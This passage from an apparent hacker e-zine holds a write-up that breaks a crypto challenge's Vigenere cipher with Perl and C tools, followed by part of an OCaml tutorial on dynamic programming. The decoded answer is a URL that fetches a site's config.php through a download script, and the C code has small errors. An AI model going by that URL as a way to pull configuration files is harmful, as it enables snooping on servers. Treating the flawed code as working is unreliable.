$m[$p]--;$p++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$p++;$p++;$m[$p]++;$p++; $m[$p]--;$m[$p]--;$p++;$m[$p]++;$m[$p]++;$p++;$m[$p]++;$m[$p]++;$p++;$m[$p]--; $p++;$p++;$m[$p]++;$p++;$m[$p]++;$m[$p]++;$p++;$m[$p]--;$p++;$m[$p]--;$m[$p]--; $m[$p]--;$p++;$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--; $m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$p++;$p++; $m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]++; $m[$p]++;$m[$p]++;$m[$p]++;$p++;$m[$p]++;$p++;$m[$p]++;$p++;$m[$p]++;$m[$p]++; $m[$p]++;$p++;$m[$p]++;$m[$p]++;$m[$p]++;$p++;$m[$p]--;$m[$p]--;$m[$p]--;$p++; $m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]++;$m[$p]++;$p++; $m[$p]++;$m[$p]++;$m[$p]++;$p++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$p++; $m[$p]++;$m[$p]++;$p++;$m[$p]++;$m[$p]++;$m[$p]++;$p++;$m[$p]--;$m[$p]--; $m[$p]--;$m[$p]--;$p++;$m[$p]++;$m[$p]++;$m[$p]++;$p++;$m[$p]++;$m[$p]++; $m[$p]++;$m[$p]++;$p++;$p++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$p++;$p++; $m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;$p++;$m[$p]--; $m[$p]--;$m[$p]--;$m[$p]--; while($m[$p]){;$p--;}; $p++; # You may ask what that massive crap did. # What it did was fill out a string of 62 characters # This is the template of our phrase, the ciphertext OVERLOAD or $m[$_] = $m[$_] % 256 for 0 .. $#m; # Another normalization hack if you do not want to overload # Our ciphertext is: # 203 224 217 209 168 146 158 199 209 200 205 211 196 221 199 212 146 212 213 # 211 148 195 160 146 227 214 198 198 215 196 197 218 145 223 204 213 162 210 206 # 205 211 160 157 147 199 149 153 201 198 219 210 158 199 212 209 210 206 200 156 # 211 215 212 # display(); # exit; # Start at first char of phrase # Current structure is: # 0 password 0 j ciphertext while($m[$p]){; $p--;$p--;$m[$p]++; # counter++ # display() if $d < 5;$d++; $p--; while($m[$p]){ ;$p--; }; $p++; # Down to bottom (1) while($m[$p]){ while($m[$p]){; $p++; }; $p--; # Counter right after password? $m[$p]++; # ++ $p++;$p++; $m[$p]--; # -- first char of phrase $p--;$p--; while($m[$p]){ $p--; }; $p++;$m[$p]--; # Back down to 1, subtract one }; $p++; while($m[$p]){ ;$p++; }; $p--; # Counter after password $m[$p]--; # -- $p++;$p++; # First char print chr $m[$p]; # print it # print $m[$p], ' '; # print non-ascii values in debugging $m[$p] = new Eightbit(0); $p++; # next }; }; __END__ 1.3 Understanding Ok, let me explain that. First, here's how the total program works in Perl pseudocode print "PW: "; my $pass = ; if (hash($pass) != 128) { destroy_data(); print "WRONG"; } else { my $ciphertext = ciphertext(); my $plaintext = decrypt($pass, $ciphertext); print $plaintext; } We are provided with a ciphertext, we provide a password, and it decrypts it according to the password. The block above takes the first character of the password, subtracts that from the first character of the string, then removes that character of the string and moves on to the next, and copies that first character of password to the end of the password. So the password rotates, such as: abcdef -> bcdefa -> cdefab And we keep going until we have exhausted the ciphertext What is this? It's a Vigenere cipher! A Vigenere cipher is a series of shift ciphers, so if you chose a password like "caesar", then the first character of your ciphertext would be the sum of the first character of your plaintext and 'c'. The second character of the ciphertext is the second character of your plaintext added with 'a'. When you run through the passphrase, you just start at the beginning again. The ciphertext is the same length as the plaintext, with a one-to-one character correspondence. The Vigenere cipher is a simple stream cipher, and there are many weaknesses in it. I conveniently have code to pwn those! See rattle's first crypto challenge at http://www.awarenetwork.org//crypt0/vigenere/ Except, I don't think it will work. Maybe not. Vigenere is easier to break the longer the text is, and the bigger the text:password length ratios. We have a 61 character ciphertext. The password better not be fucking 40 characters again. That would be unbreakable by Kasiski or Z (hehe) methods --[ 02 ]------------------------------------------------[ Wordlist Attack ]----- Using a wordlist is a good place to start. About 1/256 of possible phrases will work (because the hash result is stored as an eightbit value), so if you have sizable wordlists then this is definitely worth a shot. First, trim your wordlists down to size. 2.1 filter.c #include #include #include #include #include #define MAX_LEN 30 void transform(char*); int valid_hash(const char*); uint16_t line_length(const char*); void usage(); int main(int argc, char **argv) { char buffer[MAX_LEN + 2]; FILE *in_fh, *out_fh; if (argc < 3) usage(); if ( (in_fh = fopen(argv[1], "rb")) == NULL ) { perror("Input file"); exit(EXIT_FAILURE); } if ( (out_fh = fopen(argv[2], "w")) == NULL ) { perror("Output file"); exit(EXIT_FAILURE); } while ( fgets(buffer, MAX_LEN, in_fh) != NULL ) { transform(buffer); if ( valid_hash(buffer) ) { if ( fputs(buffer, out_fh) == EOF ) { puts("File printing error"); fclose(out_fh); exit(EXIT_FAILURE); } } } fcloe(in_fh); fclose(out_fh); return(EXIT_SUCCESS); } void transform(char *buffer) { int32_t length = line_length(buffer); buffer[length] = '\n'; buffer[length+1] = 0; } int valid_hash(const char* buffer) { if (!buffer) return 0; uint8_t total = 0; int32_t pos = line_length(buffer) - 1; if (pos <= 0) return 0; while ( pos >= 0 ) { total += buffer[pos] * 2; --pos; if (pos < 0) break; total -= buffer[pos]; --pos; } return total == 128; } uint16_t line_length(const char* buffer) { unsigned int pos = 0; while ( buffer[pos] != '\n' && buffer[pos] != '\r' && buffer[pos] != 0 ) ++pos; return pos; } void usage() { puts("./chall4 inputfile outputfile"); exit(EXIT_FAILURE); } 2.2 Results I used the above code to generate a wordlist. I basically put all of my translated program into a subroutine and then did this: while (my $word = <$fh>) { my $temp = compute($word); $temp =~ /aware|mortal|rattle|penis/i and print "Success: $word"; $temp =~ /[Tt]he/ and print "Lesser success: $word"; } A temporary variable is good because the actual computation is very expensive. Twenty $m[$p]++ in a row is a series of operations, while $m[$p] += 20 would be a little more atomic by Perl standards. Plus it's just a lot of stuff happening, and all happening in Perl. Not to mention it's all happening on an overloaded object. Using C would be more efficient, but really was not worth it after I had my Perl generated. Considering you end up with a shortened wordlist, this does not take too long. Now if I was going to bruteforce, then I would want to lose Perl. By the way, I do not chomp($word) before running it through compute(), because the newline is needed at the end. That is also convenient for my output. Unfortunately, I had no success. I lacked the necessary word or phrase. --[ 03 ]--------------------------------------------------[ Cryptanalysis ]----- The trick to beating a Vigenere cipher is to find the length of the password. Once you have that, then you just have a series of Caesar ciphers. A Caesar cipher is just a cipher where the alphabet has been shifted, such as rot13 encoding. To find out the shift, you just assume that the most common character is a space (or an 'e', or whatever the appropriate character is) and then you've found the shift. The Vigenere cipher is stronger than a simple Caesar cipher not only because you have to find out the passphrase length, but also because it gives you a series of smaller shift ciphers ( n / length(passphrase) ) to work with. To find the length, there is the traditional Kasiski method, and then there is the method I used successfully last time. 3.1 Kasiski Method The Kasiski method is to find repeated substrings. These suggest that the password has overlapped the same plaintext at the same period in the password rotation. This is very possible given common English words like "the" and such, and is compounded by the shortness of the password. For reoccurances that are not coincidences, the length between them will be some multiple of your password length. Imagine you have an 18 character password. Somehow your ciphertext has some term repeated twice. The second time it happens, that *could* be with a completely different plaintext, just with a different part of the password. Or it could be the same plaintext, which only turns out to be the same ciphertext when that plaintext is ciphered against the same part of the password. Imagine the repeated string is 195 227 194 218 208. This might have happened because of the following situation, where the password is 'blackhats'. aware is aware. blackhatsblackh The string 'aware' perfectly overlaps with 'black' twice, creating the same ciphertext in both occasions. As I said before, this could happen randomly, with random plaintexts on different part of the password. The longer your repeated string is, the less likely it's random. A lot of two-character repetitions can be ignored, and probably should be if you have anything longer to work with. This tells us something. If we look at the difference in space between the two repeated strings, we would see that they are nine characters apart. They are nine characters apart because that is the length of the password, it's only at nine (or eighteen or twenty-seven or other multiples of nine) that the password repeats itself. This is a fake example. In reality, if the term 'aware' is repeated enough and you get one or more repetitions in your ciphertext, they could be quite apart. They could be 72 characters apart, for example. If they were 72 characters apart, then we could guess that the passphrase is 72 characters long, or 36, or 24, or 18, or 12, or 9, 8, 6, 4, 3, 2, or 1 characters long. This one repetition on its own gives us these options (72 has a lot of factors!). What we do is analyze all large repetitions, aggregate the data, and see what fits. If there was good repetition that was 81 characters away, we then narrow down our possibilities to 9, 3, and 1. Once we have our password length we just split the text into individual Caesar ciphers and start to break them. We figure out what our likely most common character is, perhaps space or 'e' or period, and then we use that to find the shift amount in any given individual Caesar cipher. However, there are a some issues that could render this ineffective in our case, and ultimately running the Kasiski method against our ciphertext failed. As you can see, very few single-character values repeat at all, let alone multi-character strings! It's only a 61 character ciphertext! # The count of any given ciphertext character $VAR1 = { '204' => 1, '206' => 2, '198' => 3, '227' => 1, '200' => 2, '162' => 1, '147' => 1, '156' => 1, '218' => 1, '168' => 1, '215' => 2, '201' => 1, '145' => 1, '224' => 1, '148' => 1, '223' => 1, '217' => 1, '158' => 2, '205' => 2, '212' => 4, '219' => 1, '214' => 1, '157' => 1, '149' => 1, '197' => 1, '221' => 1, '203' => 1, '210' => 3, '213' => 2, '199' => 4, '146' => 3, '160' => 2, '153' => 1, '211' => 4, '209' => 3, '196' => 2, '195' => 1 }; 203 224 217 209 168 146 (158 199) 209 200 (205 211) 196 221 199 212 146 212 213 211 148 195 160 146 227 214 198 198 215 196 197 218 145 223 204 213 162 (210 206) (205 211) 160 157 147 199 149 153 201 198 219 210 (158 199) 212 209 (210 206) 200 156 211 215 212 There are no long repeated substrings. Three two-character strings repeat twice: 205 211 : 29 : (1) 29 210 206 : 18 : (1) 2 [3] 6 {9} 18 158 199 : 45 : (1) [3] 5 {9} 15 45 1, 3, and 9 are the best potential password lengths. But make no mistake, these could be coincidences. 3.2 Z Method What I do is take potential lengths (like 5-20), and find out how unbalanced the character distribution would be if the password was that length. If it is the wrong length, we will find the distribution balancing down. If it is the right length, the common letters (like 'e') will be much more common in our resulting plaintext. The way I actually did this in the challenge was to generate the Caesar ciphers for any given length. Then for each cipher, I just added the count of the most common plaintext character. Add the counts from all the shift ciphers, and I get a score for any given length. This is not the best way to incorporate all information about distribution, but it worked. I also did not necessarily score it in the most effective way, so I implemented a few methods. If you guess the length right, you will find many duplicate characters. For example, say we have individual Caesar ciphers with 80 items, after guessing the right length. Maybe in a given one, 10 of those 80 chars are the same. That is, they are the same because they are all supposed to be spaces, and since they are all in the same shift cipher they have all been shifted by the same amount. It does not really matter whether these characters are all spaces or 'e's or anything in particular, what matters is how noticable they are. On the other hand, if we had the wrong length, we'll just have a somewhat random distribution. The ciphertext characters will not match up correctly with the other ones that are shifted by the same amount, and our duplicates will be distributed to different shift ciphers. This means that we will not have as many duplicates in any given shift cipher, at least it is not as likely. Here, from rattle's earlier Vigenere challenge, the distribution up to 50 characters. Length: 1 |-| Sum: 253 Length: 2 |-| Sum: 278 Length: 3 |-| Sum: 256 Length: 4 |-| Sum: 288 Length: 5 |-| Sum: 343 <-- Jump! Length: 6 |-| Sum: 283 Length: 7 |-| Sum: 270 Length: 8 |-| Sum: 369 <-- Jump! Length: 9 |-| Sum: 261 Length: 10 |-| Sum: 483 <-- Massive jump! Length: 11 |-| Sum: 273 Length: 12 |-| Sum: 300 Length: 13 |-| Sum: 279 Length: 14 |-| Sum: 295 Length: 15 |-| Sum: 360 <-- Jump Length: 16 |-| Sum: 390 Length: 17 |-| Sum: 272 Length: 18 |-| Sum: 291 Length: 19 |-| Sum: 279 Length: 20 |-| Sum: 728 <-- Massive jump! Length: 21 |-| Sum: 290 Length: 22 |-| Sum: 296 Length: 23 |-| Sum: 291 Length: 24 |-| Sum: 393 <-- Jump! Length: 25 |-| Sum: 366 Length: 26 |-| Sum: 310 Length: 27 |-| Sum: 291 Length: 28 |-| Sum: 318 Length: 29 |-| Sum: 286 Length: 30 |-| Sum: 506 <-- Jump! Length: 31 |-| Sum: 304 Length: 32 |-| Sum: 419 Length: 33 |-| Sum: 311 Length: 34 |-| Sum: 322 Length: 35 |-| Sum: 382 Length: 36 |-| Sum: 332 Length: 37 |-| Sum: 322 Length: 38 |-| Sum: 329 Length: 39 |-| Sum: 315 Length: 40 |-| Sum: 1209 <-- Super huge crazy massive jump! Length: 41 |-| Sum: 313 Length: 42 |-| Sum: 336 Length: 43 |-| Sum: 322 Length: 44 |-| Sum: 362 Length: 45 |-| Sum: 400 Length: 46 |-| Sum: 346 Length: 47 |-| Sum: 339 Length: 48 |-| Sum: 442 Length: 49 |-| Sum: 329 Length: 50 |-| Sum: 532 The values get higher as you go (quite naturally) but we are looking for big jumps. I pointed out some. As you can see, 40 characters is the winner by far, and its factors of 20, 10, 8, and 5 had big jumps as well. The jump gets bigger (both in change and proportion) the larger the factor. So, here is the analysis for our small ciphertext: Length: 1 |-| Sum: 4 Length: 2 |-| Sum: 7 Length: 3 |-| Sum: 6 Length: 4 |-| Sum: 9 Length: 5 |-| Sum: 10 Length: 6 |-| Sum: 10 Length: 7 |-| Sum: 11 Length: 8 |-| Sum: 13 Length: 9 |-| Sum: 15 Length: 10 |-| Sum: 12 Length: 11 |-| Sum: 14 Length: 12 |-| Sum: 15 Length: 13 |-| Sum: 14 Length: 14 |-| Sum: 14 Length: 15 |-| Sum: 18 Length: 16 |-| Sum: 19 Length: 17 |-| Sum: 20 Length: 18 |-| Sum: 22 Length: 19 |-| Sum: 23 Length: 20 |-| Sum: 21 Length: 21 |-| Sum: 23 Length: 22 |-| Sum: 24 Length: 23 |-| Sum: 25 Length: 24 |-| Sum: 26 Length: 25 |-| Sum: 25 Length: 26 |-| Sum: 26 The rest (up to 62) are all one or zero sum jumps. Note that a 62-character password will never have its 62nd character used against the 61-character ciphertext. It would be a one-time pad. A 30 character passphrase would find every character used twice, which would tell us nothing. Part of me likes to imagine that rattle would give us a chance on this. Something less than 30. Well, what do we have? No massive peaks. The only jumps that even get out of order at all are 2 and 9, with a respectable jump at 15. So what can I say? Both methods concur for 9, but we really do not have much on it. The reason they concur is not a coincidence, in this situation they are almost measuring the same thing. 3.3 Analysis Assuming a nine-character password: Individual Caesar Ciphers 1 2 3 4 5 6 7 8 9 203 224 217 209 168 146 (158 199) 209 200 (205 211) 196 221 199 212 146 212 213 211 148 195 160 146 227 214 198 198 215 196 197 218 145 223 204 213 162 (210 206) (205 211) 160 157 147 199 149 153 201 198 219 210 (158 199) 212 209 (210 206) 200 156 211 215 212 Range of values: 64 62 69 14 65 66 70 68 15 Distance between smallest and next smallest: 13 52 48 01 04 01 01 01 01 Distance between highest and next highest: 04 14 06 04 02 01 04 02 01 Range of potential characters (Nothing smaller than 32 or higher than 122): 1 2 3 4 5 6 7 8 9 91-117 102-121 95-116 87-163 99-124 89-113 105-125 90-114 91-166 Good news! These ranges tell us that there could be some high uppercase (W at worst), all the way up to two possible extremities (163,166). If we put an upper limit of 126 on these, and get a range of 87-126, these 39 positions include all 26 lowercase letters. What does this mean? It means we might be looking at an entirely lowercase password. This is, of course, assuming that rattle did not make use of the full eightbit space. Could I be wrong? Absolutely. One or more of these could hold characters smaller than 32, such as a newline. There are also no overflowing results. Seems like mostly alphanumberic text ciphered with an alphanumeric passphrase. Columns six, seven, and eight all have low bottoms, and then values one higher than that. What low consecutive ASCII characters could be used? Space and exclamation mark? One thing I was hoping for was for the last letter in the plaintext to be a period. No such luck, or at least not with a nine-character passphrase. The ciphertext is too short to contain multiple sentences, so there should not be excessive punctuation. Just one sentence, so the low two characters in those three columns might not be the exclamation mark and space. If they were dash and period, we would get this: 1 2 3 4 5 6 7 8 9 203 224 217 209 168 . ( b ) 209 200 (205 211) 196 221 c d - 212 213 211 148 195 160 . r q 198 198 215 196 197 218 - o g 213 162 (210 206) (205 211) 2 - 199 149 153 201 198 219 n ( b ) 212 209 (210 206) 200 156 m g o That looks blatantly wrong, as did a couple of other things I checked. 3.4 Alternative Something I wanted to do, but ended up not doing, was to use a scoring system and rank different potential passwords. I'd call it a z-score for ciphers, just to mess with you. It has nothing to do with statistical z-scores. The idea is that we measure the goodness of fit of a password. We create an acceptable list of characters that we could expect in the plaintext, including letters, numbers, punctuation, etc. Then we calculate the percentage of resulting characters that are within that character set for a given password. So if a password resulted in an entirely alphanumeric plaintext, the score would be 100. Another password that gave us 59 alphanumeric characters out of 61 would have a score of 59/61 = 97. The point is that we can rank potential passwords according to this score. Even if we do not have the correct password at any point, if we get enough characters right then that will be reflected in the score. Calculate the scores through a wordlist or as you bruteforce, and watch the top. You have a good chance of learning part of the password. --[ 04 ]-----------------------------------------[ Known Plaintext Attack ]----- 4.1 Motivation Originally I expected this to be a sentence, such as an IRC quote. I even wondered if it could be the very sentence that was the passphrase last time. I checked that. There are a few very different low-ASCII values, and having a single sentence with limited punctuation just did not make sense. Eventually it hit me: this could be a URL. If the plaintext started with "www", we could figure this out trivially! It didn't, because then the fourth value (209) would have to represent a period, and since 209 was the largest value in that shift cipher, there would be six characters with lower ASCII values. Could it start with "http://"? It just might! That looked like it made sense, except possibly for that fourth character. Was 'p' likely to be the highest ASCII character out of seven? Since I had doubt, I really did not want to do all of it by hand. So I wrote this script for decyphering a Vigenere cipher with some known plaintext and known key length. 4.2 kpt.pl #!/usr/bin/perl use strict; use warnings; my @ciph = qw/ 203 224 217 209 168 146 158 199 209 200 205 211 196 221 199 212 146 212 213 211 148 195 160 146 227 214 198 198 215 196 197 218 145 223 204 213 162 210 206 205 211 160 157 147 199 149 153 201 198 219 210 158 199 212 209 210 206 200 156 211 215 212 /; my ($kpt, $len, $start) = @ARGV; unless ( $len ) { print "perl $0 known-plaintext len \n"; exit -1; } ($start ||= 0) <= $#ciph or die "pos out of range\n"; my @kpt = map ord, split '', $kpt; # Default pass character my @pass = ('*') x $len; # Generate the password based on the known plaintext for my $i ( 0 .. $#kpt ) { $pass[($start + $i) % $len] = $ciph[$start + $i] - $kpt[$i]; } # Print our guessed password print "Estimated password: "; for my $val ( @pass ) { print $val eq '*' ? $val : chr $val; } print "\n"; # Print our plaintext for my $i ( 0 .. $#ciph ) { print $pass[$i % $len] ne '*' ? chr($ciph[$i] - $pass[$i % $len]) : '*', ''; $i % $len == $len - 1 and print "\n"; } print "\n"; 4.3 Results zshzn@grapevine:~$ perl kpt.pl http:// 9 Estimated password: cleanco** h t t p : / / * * e a n c o d e * * r g / b 2 / t * * c k _ d l . p * * ? f i l e = . * * 2 - d e m o / * * n f i g . p h * There we have it, and the rest of the password is even in that plaintext: cleancode. The solution: http://cleancode.org/b2/track_dl.php?file=./b2-demo/config.php --[ 06 ]----------------------------------------------------[ Conclusions ]----- I certainly underestimated the known plaintext attack at the beginning. Not only could I accurately guess part of the plaintext, I could have written code to rotate a guessed string (like "php" for example) and find where an estimated plaintext fit in. One thing that would have made it that much more challenging would have been base64 encoding. But as it was, it was a pretty diverse set of characters in the plaintext. Sure wasn't a simple space-based sentence like traditional examples. Any kind of unknown encoding before ciphering would have made this much more difficult, especially anything that integrates across the plaintext. Might as well not bother using a Vigenere cipher at all then. There really is very added little security in using a Vigenere cipher. Sure it took work, but I did eventually beat it. Password length, or more accurately (ciphertext length / password length), is a crucial determinant of the security level. A ratio of seven is much too high. If it was three, i.e. a twenty- character passphrase, then knowing seven bytes would only have revealed a third of the text, leaving much work to do. That's still horrible. Ultimately a Vigenere cipher is only as useful as the degree to which it is a one-time pad. --------------------------------------------------------------------[ EOF ]----- [==============================================================================] [-----------------[ Dynamic programming with functional style ]----------------] [==============================================================================] _.d####b._ .############. .################. .##################.__ __ __ __ _ _ __ __ ##############/´_`|#\ V V // _` | '_/ -_) ##############\__,|# \_/\_/ \__,_|_| \___| ###########>"<###### *#########( )####* ##########>.<##### author: Teferi ################ date: 2008/08/08 *############* "T######T" --[ 00 ]----------------------------------------------[ Table Of Contents ]----- 1. Introduction 2. Introducing: The algorithm 3. The naive approach 4. Digression 1: Untying the recursive knot 5. The untied approach 6. Digression 2: Y-Combinators 7. Re-introducing the caching 8. Getting rid of the imperative cache 9. Digression 3: Monads 10. Final solution 11. Conclusions and further perspectives --[ 01 ]---------------------------------------------------[ Introduction ]----- Today you are going to learn a fair bit of techniques that will aid you in programming in functional languages. The way I will introduce these techniques is by translating a imperative algorithm that uses the paradigm of dynamic programming into a funtional algorithm. This article is intended for people who are not yet functional programming gurus, but like the prospect of learning some more helpful stuff. You should, however, be familiar with the basics of this sort of programming. Also, some basic knowledge of OCaml [1] might be helpful, since that will be the language I will be using. This language makes it easier to cross the border from an imperative setting to a functional one (yes, I will be cheating quite a bit in doing that, but the final result will be purely functional). As you probably know, the usual way of dynamic programming is solving small subproblems and combining them, bottom up, into a larger subproblem - until you are left with the final problem and a set of subsolutions to combine them into an actual solution. Ok, this was really informal, I think we need to have a deeper look at the principles at work here: To be able to use dynamic programming you first need to identify something called a "principle of optimality" in literature [2]. In my lecture notes from a few years ago there was an example what such a principle might look like: OptSol(x1,...,xn) = Comb(OptSol(x1,...,x(n-1)),OptSol(x2,...,xn)) But do not be fooled by the general look of this formula, the "principle of optimality" might look quite different in other cases. Actually it will even look different in the case we are going to discuss. All you have to remember is that you need to be able to derive a optimal solution for a problem from optimal solutions of the subproblems. For more on this, have a look at the wikipedia entry on the Bellman Equation[3]. To find the optimal solution, we now need to partition our problem into subproblems, solve these and combine them. Sounds a bit like "Divide and Conquer" doesn't it? Well, please don't try divide and conquer for solving the subproblems, because for most cases they tend to overlap quite a bit. A quick example for this: fib(0) = 1 fib(1) = 1 fib(x) = fib(x-1)+fib(x-2) This is the divide and conquer method. You can easily see that this creates an overhead by calculating quite a bit of the Fibonacci sequence more than once. If you do it this way, though: fib(0) = 1 fib(1) = 1 for i = 2:n fib(i) = fib(i-1) + fib(i-2) end then you are repeatedly caching the solutions, so you can access them again, in case they overlap. We will go down the "Divide and Conquer" again, when we want to see how to do this in a functional setting. On the other hand, this will only be a small side track, we hope to leave as soon as possible. --[ 02 ]--------------------------------------------------[ The Algorithm ]----- Ok, so now we need to decide on an Algorithm to twist around. Since I am mainly working in the field of MIR (Music Information Retrieval) I'll propose dynamic time working (DTW). Any objections to that? No? Ok then here it goes. The goal of this algorithm is to find out how much it costs to align two sequences of data. These sequences could be anything, in my case they usually are feature sequences for musical pieces. Another really popular application for this algorithm is gene sequences. Let's start out with a nice picture: (editor's note: lol nice picture T) Sequence 1: a a b c |/ /| | Sequence 2: a b b c We have two pointers, one pointing into each of these sequences, starting at the beginning. The cost of one step is measured by a metric on the feature space (our a's, b's and c's in this case), representing the "distance" between two features. In each step we can go forward one step on either sequence alone or on both of them. Now, when we sum up all the costs, what will be the minimum cost we have to pay, to walk across the whole pair of sequences? In our example above, if we assume the discrete metric, we do not have any costs at all. The way to walk across them is hinted at by the bars. For more information I'll have to redirect you to wikipedia again [4]. For more ideas on how to use this algorithm I can point you to [5]. To compute the cost, we could of course calculate all possible action-sequences and then find the optimal one, but that is a big no-no. Instead we have a closer look at the problem: When we are at the end of both sequences with optimal solutions for all states that lead to the end, and simply take the best one, we obtain an optimal solution for the problem itself. Hey, that sounds almost like a principle of optimality. More formally: DTW(0,0) = dist(s1[0],s2[0]) DTW(a,b) = infinity; if a or b are smaller than zero DTW(a,b) = dist(s1[a],s2[b]) + min {DTW(a-1,b-1), DTW(a ,b-1), DTW(a-1,b )} Iterating over this gives us: int DTWDistance(char s[1..n], char t[1..m], int d[1..n,1..m]) { declare int DTW[0..n,0..m] declare int i, j, cost for i := 1 to m DTW[0,i] := infinity for i := 1 to n DTW[i,0] := infinity DTW[0,0] := 0 for i := 1 to n for j := 1 to m cost:= d[s[i],t[j]] DTW[i,j] := minimum(DTW[i-1,j ] + cost, // insertion DTW[i ,j-1] + cost, // deletion DTW[i-1,j-1] + cost) // match return DTW[n,m] } (Thanks to wikipedia for sparing me from having to write this) However, this relies haviely on loops, and we want to be able to do it functional style. So the next step is to discard this algorithm and start over again. --[ 03 ]---------------------------------------------[ The naive approach ]----- We will at first do this very naively using "divide and conquer". So we have our first solution: let rec dtw ?pos s1 s2 dist = match pos with None -> dtw ~pos:(Array.length s1-1,Array.length s2-1) s1 s2 dist | Some (a,b) -> if a <0 || b < 0 then infinity else if a = 0 && b = 0 then dist s1.(0) s2.(0) else dist s1.(a) s2.(b) +. List.fold_left min infinity [dtw ~pos:(a-1,b-1) s1 s2 dist ; dtw ~pos:(a ,b-1) s1 s2 dist ; dtw ~pos:(a-1,b ) s1 s2 dist ] ;; Quite simple, isn't it? We transformed our equation into an algorithm. So now we point this to our mp3 files and get busy with something else? Well, not exactly. As I pointed out before, this algortihm is horribly inefficient, so on long enough sequences of features it would terminate briefly before the milky way implodes. We now have to find a way to introduce caching. let rec dtw s1 s2 dist = let cache = Hashtbl.create 10 in let rec dtw' (a,b) = try Hashtbl.find cache (a,b) with Not_found -> if a <0 || b < 0 then infinity else if a = 0 && b = 0 then dist s1.(0) s2.(0) else dist s1.(a) s2.(b) +. List.fold_left min infinity [dtw' (a-1,b-1); dtw' (a ,b-1); dtw' (a-1,b )] in dtw' (Array.length s1-1,Array.length s2-1) ;; Yes, I admit, that is not as pretty as before, and it's even _cheating_, as we are using an imperative Hashtable for caching. We are going to get rid of these deficiencies soon, but first a little digression to a very useful technique. --[ 04 ]-----------------------[ Digression 1: Untying the recursive knot ]----- So what does it mean, when someone tells you to untie the recursive knot? It means that there is a recursion hidden somewhere that we are going to get rid of. Indeed, we are going to write some recursive definition without the use of recursion. Theory proves that this can be done. If you are not familiar with lambda-calculus, now is the time to have a look at it: For example, check [7] or find a more entertaining introduction in [8]. As you might know, functional programming is loosely based on lambda-calculus. In lambda-calculus we only have one type (let's call it F here) and this type consists of functions from F to F... Somewhat like this: type F = F -> F;; (* No, this won't work in OCaml, unless you turn -rectypes on *) All these functions are nameless functions (so called lambda-functions). So, without a name - how are you going to refer to a function for recursion? Well, actually you won't, because you can't. There is no such thing as recursion in lambda-calculus. However, let's just see how we can do something similar to recursion, in a less formal version of lambda-calculus: let fac' = \ fac n -> if n = 0 then 1 else n * fac fac (n-1) in fac' fac' It might take a while until this approach starts to make sense, depending on your knowledge of mathematics in general and especially of lambda-calculus. What we do here is to pass, to the function, a version of itself. It then gets called, again passing it to itself. This is no recursion, since we do not explicitly refer to the function in itself. The recursive knot however has to be retied, and this happens in the call "fac' fac'". If you really want to understand the idea of this, try programming this version of the factorial function on your own in a programming language of your choice. It actually works in almost any language, I did it myself in Java, C, OCaml and BASH a few years ago. You might have to fiddle around a bit though, to convince the compiler that you know what you are doing. So here is one example on how to use this technique in a practical way: Let's say you have two functions, that are mutually recursive, we'll just call them even and odd here (thanks to Dr. Jon Harrop for giving this example on the caml_beginners::[] Mailinglist [6]). let rec even ?(xs=[]) ?(ys=[]) = function | [] -> xs, ys | h::t -> odd ~xs:(h::xs) ~ys t and odd ?(xs=[]) ?(ys=[]) = function | [] -> xs, ys | h::t -> even ~xs ~ys:(h::ys) t;; These two functions partition a list into those elements at odd places and those at even places: # even [0;1;2;3;4;5];; - : int list * int list = ([4; 2; 0], [5; 3; 1]) Now we untie these definitions: let rec even odd xs ys = function | [] -> xs, ys | h::t -> odd (h::xs) ys t;; let odd even xs ys = function | [] -> xs, ys | h::t -> even xs (h::ys) t;; Now we could, for example, put both functions into seperate modules, we just have to retie the knot at some other place: let rec even' xs = even odd' xs and odd' xs = odd even' xs;; We'll be able to do this almost automatically lateron, but first we have to take some further steps and learn some more. --[ 05 ]--------------------------------------------[ The untied approach ]----- So let's just apply the newly learned to our algorithm. We will go back to the first step and use the version without caching, to make it more concise and readable. Here's the algorithm again: let rec dtw ?pos s1 s2 dist = match pos with None -> dtw ~pos:(Array.length s1-1,Array.length s2-1) s1 s2 dist | Some (a,b) -> if a <0 || b < 0 then infinity else if a = 0 && b = 0 then dist s1.(0) s2.(0) else dist s1.(a) s2.(b) +. List.fold_left min infinity [dtw ~pos:(a-1,b-1) s1 s2 dist ; dtw ~pos:(a ,b-1) s1 s2 dist ; dtw ~pos:(a-1,b ) s1 s2 dist ] ;; The optional pos argument can get quite annoying, so we'll rid ourselves of it first: let dtw s1 s2 dist = let rec dtw' (a,b) = if a <0 || b < 0 then infinity else if a = 0 && b = 0 then dist s1.(0) s2.(0) else dist s1.(a) s2.(b) +. List.fold_left min infinity [dtw (a-1,b-1); dtw (a ,b-1); dtw (a-1,b )] in dtw' (Array.length s1-1,Array.length s2-1) ;; This is much better. Now we can easily untie the recursive knot and retie it again, at the end: let dtw s1 s2 dist = (* untied version *) let dtw' dtw (a,b) = if a <0 || b < 0 then infinity else if a = 0 && b = 0 then dist s1.(0) s2.(0) else dist s1.(a) s2.(b) +. List.fold_left min infinity [dtw (a-1,b-1); dtw (a ,b-1); dtw (a-1,b )] in (* retying the knot *) let rec dtw = dtw' dtw in dtw (Array.length s1-1,Array.length s2-1) ;; Now - what have we actually achieved by this? You should be able to tell that we're still horribly inefficient, because there is no caching. This will be re-introduced in a later stage, though, when we automatize the step of retying. For this, we need to have a look at Y-Combinators. --[ 06 ]------------------------------------[ Digression 2: Y-Combinators ]----- Let's see if we can extract the process of retying the knot from the function above. It seems that at the end, we take a function f, apply it to an untied version of itself, yielding the untied version we just used. Well, sounds like black magic at first. But read it a few times, and you will see that this is just the basic pattern for recursion. In a general way it can be programmed like this: let y f = let rec f' arg = f f' arg in f' ;; The type of this is: val y : (('a -> 'b) -> 'a -> 'b) -> 'a -> 'b This is one possibility for for the so called Y-Combinator. An alternative would be: (* careful, this one wont work as expected *) let rec y f = f (y f);; At least it would be in pure lambda calculus. However OCaml is not a lazy language, and will hence try to evaluate the full recursion, before calculating anything else. We have to trick it into doing 